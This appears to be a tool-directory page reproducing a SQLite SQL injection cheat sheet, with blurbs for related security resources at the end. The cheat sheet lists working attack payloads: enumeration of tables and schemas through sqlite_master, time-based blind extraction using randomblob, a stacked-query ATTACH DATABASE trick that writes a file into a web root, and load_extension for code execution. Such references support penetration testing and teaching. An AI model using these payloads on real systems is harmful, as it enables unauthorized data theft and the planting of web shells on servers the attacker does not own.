SQLite SQL Injection Cheat Sheet Logo

SQLite SQL Injection Cheat Sheet

0
Free
Visit Website

If you need You use Concatenation || Comments -- Conditionals CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' Substring substr(string,start,stop) Length length(string) Quotes without literal quotes cast(X'27' as text) --use X'22' for double quotes Table name enumeration SELECT name FROM sqlite_master WHERE type='table' Table schema enumeration SELECT sql FROM sqlite_master WHERE type='table' Time-based data extraction cond='true' AND 1=randomblob(100000000) --causes time delay if cond='true' File writing 1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;-- --requires either direct database access or (non-default) stacked query option enabled Arbitrary Code Execution load_extension(library_file,entry_point) -- .dll for Windows, .so for 'nix. Requires non-default configuration

FEATURES

ALTERNATIVES

Markdown version of OWASP Testing Checklist v4 for various platforms.

The best security training environment for Developers and AppSec Professionals.

A weekly newsletter providing cybersecurity leadership insights, industry updates, and strategic guidance for security professionals advancing to management positions.

A comprehensive guide to memory forensics, covering tools, techniques, and procedures for analyzing volatile memory.

A game packed with real-life examples of how not to store secrets in software, with 46 challenges to solve.

A project developed for pentesters to practice SQL Injection concepts in a controlled environment.

A comprehensive guide to mobile application penetration testing, covering various topics and techniques

Practical security handbook for .NET developers.

PINNED